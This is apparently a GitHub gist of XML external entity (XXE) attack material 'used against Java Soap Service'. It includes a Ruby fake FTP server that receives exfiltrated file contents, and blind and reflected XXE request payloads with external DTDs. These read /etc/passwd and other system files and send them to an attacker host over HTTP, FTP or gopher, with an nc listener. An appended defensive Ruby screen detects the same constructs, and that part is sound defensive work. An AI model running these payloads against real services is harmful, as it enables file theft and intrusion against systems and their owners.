@73696e65
Last active November 22, 2016 14:51
Used against Java Soap Service
#!/usr/bin/env ruby
# Minimal fake FTP server: it answers every command with a success-style
# reply so the remote XML parser keeps the session going and prints each
# line the parser sends (the requested path carries the file content).
require 'socket'

port = (ARGV[0] || 31337).to_i
server = TCPServer.new port
puts "Listening on the port: #{port}"

loop do
  Thread.start(server.accept) do |client|
    puts "Client connected"
    client.puts("220 xxe-ftp-server")
    loop do
      req = client.gets
      break if req.nil? # peer closed the connection
      puts "< " + req
      if req.include? "USER"
        client.puts("331 password please - version check")
      else
        client.puts("230 more data please!")
      end
    end
    client.close
  end
end
--------------------------------------------------------------
XXE, where the text is reflected in the response
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % start "<![CDATA[">
<!ENTITY % body SYSTEM "file:///etc/test.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;
]>
...
<legitimate>&all;</legitimate>
--------------------------------------------------------------
a.dtd:
<!ENTITY all "%start;%body;%end;">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Locator, making remote connection
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY connect SYSTEM "http://x.x.x.x:y/test">
]>
<r>&connect;</r>
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, without proper URL encoding
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % data SYSTEM "file:///etc/system-release">
<!ENTITY % param1 "<!ENTITY send SYSTEM 'http://x.x.x.x:y/?%data;'>">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, extraction with FTP
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
%send;
]>
--------------------------------------------------------------
a.dtd:
<!ENTITY % param1 "<!ENTITY &#x25; send SYSTEM 'ftp://x.x.x.x:y/%data;'>">
--------------------------------------------------------------
--------------------------------------------------------------
XXE Blind Payload, extraction with gopher (using socket on port z)
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close
<!DOCTYPE r [
<!ENTITY % file SYSTEM "file:///proc/self/cwd">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;
]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % yy "<!ENTITY send SYSTEM 'gopher://x.x.x.x:z/?%file;'>">
%yy;
--------------------------------------------------------------
$ nc -lvnp z
--------------------------------------------------------------
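Added defensive example, not part of this gist: a Ruby pre-parse screen a SOAP front end could run on the raw request body to flag the DTD constructs every payload above relies on (inline DOCTYPE, external general entities, parameter entity declarations and references, character references spelling '%'), exercised against the locator and blind-FTP request bodies from this page plus a constructed benign SOAP request. The helper names xxe_findings and xxe_suspicious? are assumptions.

```ruby
# Added example (not the gist's code): a pre-parse screen for a SOAP front end
# that flags the DTD constructs the payloads above rely on, so the request can
# be logged and rejected before the XML parser resolves anything (hypothetical names).
def xxe_findings(body)
  findings = []
  # Any inline DTD; SOAP messages never need one
  findings << :doctype if body =~ /<!DOCTYPE\b/i
  # General entity with an external identifier (the "locator" payload)
  findings << :external_general_entity if body =~ /<!ENTITY\s+[^%\s][^>]*\b(?:SYSTEM|PUBLIC)\b/i
  # Parameter entity declarations and references (the blind payloads)
  findings << :parameter_entity if body =~ /<!ENTITY\s+%/i || body =~ /%[A-Za-z_][\w.-]*;/
  # URI scheme of every external identifier: file, http, ftp, gopher, ...
  body.scan(/\b(?:SYSTEM|PUBLIC)\s+["']([a-z][a-z0-9+.-]*):/i).flatten.each do |scheme|
    findings << :"scheme_#{scheme.downcase}"
  end
  # Character references spelling '%' to smuggle a parameter entity declaration
  findings << :encoded_percent if body =~ /&#(?:x25|37);/i
  findings.uniq
end

def xxe_suspicious?(body)
  !xxe_findings(body).empty?
end
# Constructed sample: a benign SOAP request that must pass the screen
BENIGN_REQUEST = <<~XML
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body><lookup><id>42</id></lookup></soapenv:Body>
  </soapenv:Envelope>
XML

# The "XXE Locator" request body from this page
LOCATOR_PAYLOAD = <<~XML
  <!DOCTYPE r [
  <!ENTITY connect SYSTEM "http://x.x.x.x:y/test">
  ]>
  <r>&connect;</r>
XML

# The blind FTP-extraction request body from this page
BLIND_FTP_PAYLOAD = <<~XML
  <!DOCTYPE r [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
  %connect;
  %param1;
  %send;
  ]>
XML
```

The checks are heuristics on the request text, not a parser: the safe baseline for a Java SOAP endpoint is still to disable DOCTYPE and external entity resolution in the parser itself, and this screen only adds a log line and an early reject in front of it.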